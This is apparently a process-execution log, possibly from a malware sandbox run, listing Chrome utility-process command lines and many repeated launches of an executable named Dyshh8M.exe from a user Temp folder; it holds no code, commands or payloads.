"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4776,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4836 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5172,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5076 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5176,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5280 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4832,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5428 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

